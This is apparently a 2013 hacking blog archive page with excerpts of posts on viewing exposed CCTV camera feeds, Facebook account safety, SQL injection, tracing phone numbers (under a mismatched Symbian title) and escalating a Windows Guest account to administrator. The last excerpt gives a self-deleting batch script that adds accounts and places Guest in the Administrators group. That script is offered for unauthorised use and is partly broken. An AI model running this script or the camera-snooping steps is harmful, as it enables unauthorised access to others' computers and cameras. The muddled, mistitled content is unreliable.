Skip to main content

Posts

Showing posts from September, 2013

How to Hack CCTV Camera In 5 Step

Security cameras are everywhere, it seems, but what are they looking at? How much of our comings and goings do they capture? If you have ever been curious about it, we will show you not only how to see through the eyes of Big Brother, but even how you can sometimes zoom, pan, tilt, capture, and save images right from your computer! Here is wikiHow to watch security camera streams on the internet. Steps 1:   Open up your web browser . This will be your portal into an entire world of closed circuit television (CCTV) cameras wired to the internet. Steps 2: Search one of the queries listed below under the "search queries" heading . This list is ever evolving so if one search query does not work, try another until you see results. Steps 3: Investigate the results . After you Google one of these queries, you will see thousands of search results. Click on any one of them. If the link is still active you might see a page filled with thumbnails of security came

How To Keep Facebook Account 100 % Safe From Hackers

As far as Social Media is concerned Facebook is the best media to connect with people. We all are having facebook account,But,is your account safe from hackers ? The best answer is NO !You might be thinking that,how you can say this so confidently. Okk dear ! But I have so many proofs for my statement.But how you can say that your account is safe from hacker ?Simple answer of above question can be found in following discussion !! After reading entire post you can learn " Techniques Used By Hacker " & "How you can secure your account" Create A Strong Password &raquo Take password with combination of at least six numbers, letters, and punctuation marks (like ! and &)Change password regularly. Hide Email &raquo If your email is hacked,then your account can be hacked.For this reason you must hide your email from facebook. Dont Click On Phishing Link &raquo Phishing is a page where you can find fake login page of Facebook.So neve

How to Hack website using SQL injection

Demo Of Basic SQL injection for website hacking  SQL injection is a technique often used  to attack data driven applications. This is  done by including  portions of SQL  statements in an entry  field in an attempt to  get the website to pass a newly formed rogue SQL command to  the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in an application's software. The vulnerability happens when user input is either incorrectly filtered for string literale scape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but canbe used to attack any type of SQL database. In operational environments, it has been noted that applications experience an average of 71 attempts an hour. You might have seen hackers hacking and defaceing websites, editing it with their own stuff

Hack Symbian S60 Phones

Hack Symbian S60 Phones to Install Unsigned Applications    With the rapid growth of mobile phone usage in recent years, we have often observed that the it has become a part of many illegal and criminal activities. So, in most cases tracing the mobile number becomes a vital part of the investigation process. Also, sometimes we just want to trace a mobile number for reasons like annoying prank calls, blackmails, unknown number in a missed call list or similar. Even though it is not possible to trace the number back to the caller, it is possible to trace it to the location of the caller and also find the network operator. Just have a look at this page on tracing Indian mobile numbers from Wikipedia. Using the information provided on this page, it is possible to certainly trace any mobile number from India and find out the location (state/city) and network operator (mobile operator) of the caller. All you need for this is only the first 4-digit of the mobile number.

Hack Administrator from Guest

Hack Administrator from Guest Hack Administrator Account from Guest Account.Yes!! that is quite possible.All you need to do is to follow the below procedure. echo off title Please wait... cls net user add Username Password /add net user localgroup Administrators Username /add net user Guest 420 /active:yes net localgroup Guests Guest /DELETE net localgroup Administrators Guest /add del %0 Copy this to notepad and save the file as "Guest2admin.bat" then u can double click the file to execute or run in the cmd. it works... ----------------------------------------- ADMINISTRATOR IN WELCOME SCREEN. When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode. First you must ensure that the Administrator Account is enabled: 1 open Control Panel 2 open Administrative Tools 3 open Local

Best Books